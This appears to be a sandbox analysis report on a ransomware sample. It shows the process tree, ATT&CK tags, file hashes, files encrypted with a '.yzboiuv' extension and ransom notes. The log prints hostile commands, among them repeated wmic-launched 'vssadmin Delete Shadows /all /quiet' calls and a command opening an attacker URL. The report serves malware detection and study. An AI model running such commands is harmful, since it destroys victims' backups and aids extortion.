    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:1596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:2068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2296 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2268 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1448 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:2
    3⤵
    PID:2812
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3480 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2892
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3708 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:2912
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3988 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:2960
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3796 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2140
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4236 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2164
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2744 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2436 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2524
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2424 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3656 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:2632
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4752 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=1224 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:3020
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3784 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:1
    3⤵
    PID:2496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=1228,i,11260345468962544469,5574894809670936731,131072 /prefetch:8
    3⤵
    PID:2772
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  PID:980

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1288
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- C:\Windows\system32\cmd.exe
  cmd /c "start http://4e1c3470029058e0e8yzboiuv.lieedge.casa/yzboiuv^&1^&33436333^&86^&355^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://4e1c3470029058e0e8yzboiuv.lieedge.casa/yzboiuv&1&33436333&86&355&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:808
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:808 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1460

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:940
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1240

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:596
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:624

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:476
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:900

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1352
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1300

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1108

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1368

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1988

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1256

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:1300

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2452

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
79ecef8d32a44c106d056f9914df87b3

SHA1
a1a2fcfa294823612adaee6cd15e8c5eb94014ee

SHA256
888b0f932e10ce7101c9e5187e1d709220dff48253863623a582ad339dceb677

SHA512
1ba50c5ca6152cf4fcd276c2dde965c59e9fa3ac2bbc109d93bdb09f57c3be4f85d4c0a180608a3e14193b751ea73e2ba11545b38a4b1791a8772a9d719761ee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
299049cee4e743a7c1ea157552d68c2c

SHA1
57ec741203ba2e3e9c01ffa97d18ac513b6cc488

SHA256
9624d0adc698dce0acf5db29e30e061d579d18874fd799ee1c576ea75c31f288

SHA512
ebb5dbcd4c640ba49576ae37c944cde74fa5ddc8eb8d0cc7fc969320f89db37a0c879187271431d18311a54b787a2224ff8bfa464c5a5e59da4b05e3e75ff64e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dbc986cb6cfeabddb571d2dd3dbd1db3

SHA1
f8a0560094b06892a3264a48536efd1dda6979db

SHA256
78889f6018291ae4074583647c3d2875a9f24bc5864c5e404040419618a8b785

SHA512
58f1ee9144c9e6a013c98a918d3212da37c7f995020667c7e4bc7c07b03a5321f8c16095ae4d7211068b5ce37f14ea08547e86ba43de47b4c2d61fe4f93bffe9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e8314aab6c8c3d351aae05c1330026cb

SHA1
188c439c168bc1e2ee46d2a1dc8729f97a77937f

SHA256
ba733491103dba7427077adbabdeeac720db1d67bea02463a545243ee8c5d1ec

SHA512
b52a33ac1ae7172067512f1b4c953c88481deea822ff5f8865a28413ac543b22e17229f9bee9c208f9748476da1b50bc2fc1de48f4daee45d869caf15bb24ec8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5b098bdd4f71b658912347ba944f997e

SHA1
be985ed2a97cb0f95d791b46688dc91fab62738a

SHA256
f4eae9d051d1453f28c3fc0b224e52bdbbaa5b793b99b0880bc06314233b90b7

SHA512
8f4d4c5a60221617055f2fa78962da30f651f4a5aed37031d8ba8018e31211684706fba2261c8dfd13d6d7e9041fdd500f461ba435ac5daa9f9b6a5be09f4bcc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3ea1802d739f111904382e15d16806a

SHA1
20eca11c506d3618b4d94025a4f31a6ec090818c

SHA256
419d622abb8e4452ecc5d1b025319136e823a5573805c43a7b15f95e2a23f9a4

SHA512
d8d2ff6e60a9ceed7b51c07756fc3426243a91d0883ffd4546a79e92c5aa713b9176e6aa592e4d8d75f634d92238052ad193d00f7c03922b3746dbffec67755c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
60fae1cf989c0ff6d11c6ad30e9b1f41

SHA1
b3f293e32aa78c25e88fcd64422ea3123765c804

SHA256
edb602af6e85782677257ddf1669ed0c5a0faef518888e93ab320759d2fc193f

SHA512
73c53e2f4733bb6070df2a7ebee2d80fc51255a97ffeb9d928169514ca0dcd9d7cf19edefa821f405e88cfb9953b6299f765c94ccbcf9818711261557562a0e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

Filesize
37KB

MD5
47ae9b25af86702d77c7895ac6f6b57c

SHA1
f56f78729b99247a975620a1103cac3ee9f313a5

SHA256
9bde79a1b0866f68d6baa43f920e971b5feb35a8e0af7ffadc114366f8538224

SHA512
72b5296e3dd1c5b4c42d8c3e4a56693819779167b9f02bc2d5f5a626b519a9cf10bee59846d614c929c42094b65d13039f6024f6cb1c023e740969aaefd060c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENT~RF6f2a5c.TMP

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
180b95e528b5fc1ca95c243f7c8e5a73

SHA1
1592d1a2cdfb3bb697975e0c795c3841599e6e65

SHA256
79582d8dbee73f58598d177a720ed8e40e2803da77bac456e61339a10aa49c5a

SHA512
7b79331a5ea7af4f441db4530237484d52934e3917e018f4008ad4d33015c1fd3f58ac537f6dcc0750d56b38be9b8faca0227724545f1adb83fc53ae59bab6ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
363B

MD5
ce0d43b7b5d3afd25ca0c4a1f281eb81

SHA1
5c6b29ea89d4daf19ad81db7d3157897a5f1f95b

SHA256
83c81e34c5e4f92a446fafaeebc47e769be151d5bde543368cb37c707a6e9ef1

SHA512
4964cf49a45e89495fde41dd434dcb7a7883055da07b771eda8fab89d0ab9f2451f512603020fa37619cfe860dda119ad635a46a9e52db46579323d45424cb06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
5c2db8bf1aa38fb65723a6636cae47f0

SHA1
0c83ca932e750025200729e73dff9e9527cfd7de

SHA256
74b9e74c059f7c45011dc3c7c7130189614ee913589199c621b069a4f28d34a0

SHA512
fa03007b120f1f64cd4f0b74b43d5f20beeaedd552266aaaa94b47ab19a51a1ce30d8bfa92c99b4deedc8c7b480cb1f40a33b322b1ce553cb631420739e76d56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
ec08ad46fff197608c603e2a4f9d95b9

SHA1
9df172fbef23d5b515c7a5229084e144528f0189

SHA256
abbe029fc678541965357b04a74a3e58e63473e57e20fe2b5a4bf31692ddae68

SHA512
fb9f8267592f1a6474e8b3ac062c6fa193f5ebedbe55e7a2927b741247dd44e71f16ba3d8f531010021a8023ad49ce0574f14af1ac7dbfca6c1505fb31c41725

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
76daafc47b9731a54eaccbbf799906f7

SHA1
111c8aba9855e7efdc5a97298a5140c33fcd25dc

SHA256
aa3f957220d25af3a2d6ca6e3c676d14c1f76d4f761f9ce610e72fa27ac6fa7d

SHA512
38cfc22c98031a51b3eaf667d2a561ac495252ddfbcacf5e0d03711eef87410ebe41822b95eb0a81e4a8ba0e9733661989796a7e5fb0463f80a699e01fc97b8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
4KB

MD5
345d718c915dd14c5cf7fe79b7284bd7

SHA1
10dcad7a51d67907d5b769eea4796a951522724b

SHA256
5f536ed1f206054f94e4651ddde37053800cc9f9c43d86f7145368651969511f

SHA512
bfd1a597247440e2fa79d10a997c2c1402c0ee21f1728fafc578478399125d5ced807ec1017d78bbfa49db56268c0d8915c40545947d7c5b38c10cfed386cdb7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000004.dbtmp

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\a8a87a25-7dad-4db0-ab72-a20b75f0d318.tmp

Filesize
5KB

MD5
a359ebc6d0357ed1c6c3eee0780903ea

SHA1
e5bf53df8df11413f5e803959f994e155b0d62c8

SHA256
6e820beef7730334c464227a4c496ea14a19196a8a49bb38c1b2566845bc34e3

SHA512
864abf5988e9a5a1589608025925d97685b303407983c67f405e21a97118c970153a9653659ead12411e825d2a2815a9fd1bc0e055775b606700e2df71018ffa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
200KB

MD5
d8f2c25e83255afadb18d167a90a504e

SHA1
3d87dc11ba9b1e8bee07c53286406a28785739fb

SHA256
d38582c203bd6bad9f526998a8ed6e9e764764b54562f0655f319c01b6b88b17

SHA512
4a23ba42ede6aaee9b46c91b1adf109c93e7c564556f1d9507d3f42408f9eb3f3b4979286af0e8c5824c2e0cbd158e975cf5431b7122796808791c9b18119a7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UOYUJSME\suggestions[1].es-ES

Filesize
18KB

MD5
e2749896090665aeb9b29bce1a591a75

SHA1
59e05283e04c6c0252d2b75d5141ba62d73e9df9

SHA256
d428ea8ca335c7cccf1e1564554d81b52fb5a1f20617aa99136cacf73354e0b7

SHA512
c750e9ccb30c45e2c4844df384ee9b02b81aa4c8e576197c0811910a63376a7d60e68f964dad858ff0e46a8fd0952ddaf19c8f79f3fd05cefd7dbf2c043d52c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab76A9.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7786.tmp

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7819.tmp

Filesize
161KB

MD5
be2bec6e8c5653136d3e72fe53c98aa3

SHA1
a8182d6db17c14671c3d5766c72e58d87c0810de

SHA256
1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd

SHA512
0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ZAYZA96W.txt

Filesize
606B

MD5
48a7439bc3b5be67a867f5ada931f518

SHA1
d05b99bda54e6baf461ee94e8d1ae2cb9ca1c1a3

SHA256
817469eba3b0251a5117b983a6e06aca8f3d494958c45c7f84fa48d270e7ee68

SHA512
d1aafbba788d472683916da2c1adbc1499f9c515d5a0566a287bceb7bc59b5ee2d20ef2bec009d3ee4bf55c21ac1ac0c6e5032c432bbaaaf088b153723f1a01a

Download Submit
C:\Users\Admin\Desktop\CheckpointOpen.dot.yzboiuv

Filesize
798KB

MD5
bae7b34b69f8aef4df8f4922dd99c3d4

SHA1
5266032cbb0e605dc4f9503d3861adfde0c9ef85

SHA256
a45620588fb3b1d699c3465cdbc5646509779e8f831b5e15d5864ca14bd65a51

SHA512
967825895a2d7fd5d8c560fa991402dc79ad88e32edb5dd3d4e288161b78a75e835b0d8722dbcf63c645d2f2acaabf15bada15ea4fb73c1e502ab44c5c3b8d24

Download Submit
C:\Users\Admin\Desktop\DenyWrite.xlsm.yzboiuv

Filesize
553KB

MD5
cbabd3ef55f85a06bca2962efccc2c8c

SHA1
f3e7685b3fb2b949b3c213eec995c9bca25c3a60

SHA256
8db56768dea3497c89e93a638a1c6a91608d32fe281756cf2d1bffdabda40672

SHA512
f482bdbba237933caeffbf3c14c94c71b91cfd06cbeebfa3b6157a9738a3beca2cf6ac60414e6a07053cf1c48e866520f4cac6972bd38b964f3ba0ce3f8864e1

Download Submit
C:\Users\Admin\Desktop\ExitBlock.vbs.yzboiuv

Filesize
768KB

MD5
730c1ac54b85690dceeebc56fe822e3a

SHA1
4e6c6abe56ed3f1ddd8bbcd815eed64ac3b7c4bb

SHA256
e07a65af5275d7aed30ed721dc617502c1c194466a57f31f11c7b9bbddf7f57e

SHA512
06f5608be34c5bfc3ba888d091467863c31f9543fa8a6e151d58fc4d167b0e851d167a8ef63f1fbde022c9cb096a49e0f0f2f552bf31a98405f4ff81df872d95

Download Submit
C:\Users\Admin\Desktop\InitializeEnter.vb.yzboiuv

Filesize
706KB

MD5
ea8dec73d894d7b991dd20f6c126629c

SHA1
ed4c330473b72905ccb43ed9beb2ac4c4491b753

SHA256
7548ac103c1d88e0869baca4661bfc98815b7f94f051692e55a2a01fc810086d

SHA512
6ead83df1a65b3e2fc1623ceea98fbd12ad41496696e7b5be7f7b18f3e4b7acb659c769dba83060013d77607a018bb1107c9b82b8b43ae4bc74839403d1eec18

Download Submit
C:\Users\Admin\Desktop\MoveAssert.vsdx.yzboiuv

Filesize
860KB

MD5
c2d8ca1ff7b214840f2509ffe8ccc101

SHA1
3711b4009996c07324752df1071d7e0bc8d09998

SHA256
958031c9e9a93269f2cd51c610944f05f4cc554f6a7a52c363ce9faf7e8509f3

SHA512
c10668c3f67ae23bcb35f37336b71a40945db110a2f11f07769fe2b8e4091695d2bbb8d69797346b31e29eff8b6235e20c08bf8c6c866e6d588a5b90c5cfe7fa

Download Submit
C:\Users\Admin\Desktop\PingCopy.png.yzboiuv

Filesize
522KB

MD5
b75e07870a6f2384670c60d82b96b1b4

SHA1
171497c15e062d7272290c12a1aa37efaf1161e5

SHA256
633fa060f8dbe4926d5e2e79c609588bb1e3001c75c1661e7c47dc78115a27ff

SHA512
37a630252779bc2c8591bbde58da3e19d3ac226e5b0209373b6c36fd6b52cdfd8554f9524f75d7603ae69d53de9d2e3aeca8b8cb4349d1aeec0df0e8739ef6ae

Download Submit
C:\Users\Admin\Desktop\ShowRevoke.ppsx.yzboiuv

Filesize
614KB

MD5
ec7e10a9ded626f689bbafbad3273280

SHA1
be44c103e4fcf3acf2cfbb904309be274f2829b9

SHA256
ea444362c1bd3567cf3f41764f27570f5c1e4bfd32384c0dd2cc4bb222a0b8b8

SHA512
0c89f90b68ecde90e573689ff25e61c6273716260c2147f80cca9f43ac202493ff8521960a90f86d939854a80432deeb2d2bbf8ae3d70befb1711d9099b95387

Download Submit
C:\Users\Admin\Desktop\SubmitUninstall.wps.yzboiuv

Filesize
737KB

MD5
e8998042b69fe6c790eb16460e6eee6f

SHA1
d2ab588faee2d465aa531055d651f8e3bb60d101

SHA256
8c98a495ad957e4e4b2a61996c3cfc99fdb360345402a170caa008126e72367b

SHA512
a60d1c9a26ec478d2b63145e448346c6e59d93c10e5293f35b6ffd4e81feefc393c5bee9d8a4834da68d94199bfc3094ea0251e0244f9ebc03ebc0daf42473d2

Download Submit
C:\Users\Admin\Desktop\SwitchConfirm.dxf.yzboiuv

Filesize
491KB

MD5
e1d9d9e823eb5daa636c338327a62027

SHA1
c22ca106e4a73d2e179983e85605e7231eb8655b

SHA256
27559c9907a59b67b3a7c700d3b1e14fd2764ae7bc7b672041754d5ce04ee239

SHA512
a8ff6798473f150ca29eaeeb735eebdc9e46fd7fc0f9e7a7077ae8ab5a1eb1f88b48dbd128e56ae59e82aca086ae0c6714f847323b43ce07e00dd74926d048bd

Download Submit
C:\Users\Admin\Desktop\readme.txt

Filesize
1KB

MD5
fdaac2ce2e001a31ab327ad6e6d786bb

SHA1
585a0965f3fe225ee5ca93af9a1cc47ba586e960

SHA256
8f81e74bcd55cc695dcb0f4ad051c5ad882f51562de19df6a5ea4ba90556ff79

SHA512
6a7c535c8a56c6049fd437c8e8476d08fd358b628e4afdcc78c9caae4c01f2ee69491b103058d273b050948672668c92fd7b8c828e876bcc410b941ddcc569eb

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
fdaac2ce2e001a31ab327ad6e6d786bb

SHA1
585a0965f3fe225ee5ca93af9a1cc47ba586e960

SHA256
